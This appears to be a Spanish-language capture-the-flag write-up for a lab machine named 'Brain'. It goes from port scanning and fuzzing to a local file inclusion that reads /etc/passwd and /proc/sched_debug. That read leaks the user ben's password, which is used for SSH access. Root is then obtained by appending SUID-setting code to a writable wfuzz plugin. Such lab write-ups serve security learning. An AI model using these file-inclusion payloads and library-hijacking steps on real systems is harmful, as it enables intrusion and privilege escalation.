Enumeramos puertos:
❯ sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.93❯ nmap -sCV -p 22,80 -oN 02-targeted.txt 192.168.1.93
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-11 11:26 -03
Nmap scan report for 192.168.1.93
Host is up (0.00031s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 32:95:f9:20:44:d7:a1:d1:80:a8:d6:95:91:d5:1e:da (RSA)
| 256 07:e7:24:38:1d:64:f6:88:9a:71:23:79:b8:d8:e6:57 (ECDSA)
|_ 256 58:a6:da:1e:0f:89:42:2b:ba:de:00:fc:71:78:3d:56 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.78 secondsEl sitio muestra una salida de sched_debug (el planificador del kernel), lo que sugiere que la página incluye contenido de archivos del sistema:
❯ curl http://192.168.1.93/index.php
<pre>
runnable tasks:
S task PID tree-key switches prio wait-time sum-exec sum-sleep
-----------------------------------------------------------------------------------------------------------
S systemd 1 2927.102286 1731 120 0.000000 509.025216 0.000000 0 0 /
</pre>Fuzzeamos el parámetro de inclusión en busca de un LFI y damos con include:
❯ ffuf -u 'http://192.168.1.93/index.php?FUZZ=../../../../../../../../../../../../../etc/passwd' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -fs 361
...
include [Status: 200, Size: 1750, Words: 125, Lines: 34, Duration: 3ms]
...
❯ curl 'http://192.168.1.93/index.php?include=/etc/passwd'
...
root:x:0:0:root:/root:/bin/bash
ben:x:1000:1000:ben,,,:/home/ben:/bin/bash
...Aprovechando el LFI, leemos /proc/sched_debug (que lista los procesos y sus argumentos), donde se filtran las credenciales del usuario ben:
❯ curl 'http://192.168.1.93/index.php?include=/proc/sched_debug' | grep ben
...
100 16041 0 16041 S ben:B3nP4zz 401 1692.820161 52 120 0.000000 2.308689 0.000000 0 0 /
...Nos logueamos por SSH con esas credenciales y obtenemos la primera flag:
❯ ssh ben@192.168.1.93
The authenticity of host '192.168.1.93 (192.168.1.93)' can't be established.
ED25519 key fingerprint is SHA256:fkqq58u/sGpESMAWndC860Dp3sVGoKVkrQdlahLQV5A.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.93' (ED25519) to the list of known hosts.
ben@192.168.1.93's password:
Linux brain 4.19.0-23-amd64 #1 SMP Debian 4.19.269-1 (2022-12-20) x86_64
ben@brain:~$Para escalar privilegios, revisamos los permisos sudo:
ben@brain:~$ sudo -l
Matching Defaults entries for ben on Brain:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User ben may run the following commands on Brain:
(root) NOPASSWD: /usr/bin/wfuzzPodemos ejecutar wfuzz como root. Buscamos si tenemos escritura sobre alguna de sus dependencias Python (library hijacking):
ben@brain:~$ find / -writable 2>/dev/null |grep "wfuzz"
...
/usr/lib/python3/dist-packages/wfuzz/plugins/payloads/range.py
...El plugin range.py es escribible, así que le añadimos código que asigne el bit SUID a Bash (se ejecutará como root al invocar wfuzz):
ben@brain:~$ echo 'import subprocess' >> /usr/lib/python3/dist-packages/wfuzz/plugins/payloads/range.py
ben@brain:~$ echo 'subprocess.run(["sudo", "chmod", "u+s", "/bin/bash"], check=True)' >> /usr/lib/python3/dist-packages/wfuzz/plugins/payloads/range.pyEjecutamos wfuzz usando el payload range para disparar el código y, con Bash ya SUID, lanzamos una shell de root:
ben@brain:~$ sudo /usr/bin/wfuzz -c -z range 1-2
ben@brain:~$ ls -l /bin/bash
-rwsr-xr-x 1 root root 1168776 abr 18 2019 /bin/bash
ben@brain:~$ bash -p
bash-5.0# whoami
rootObtenemos la flag y fin.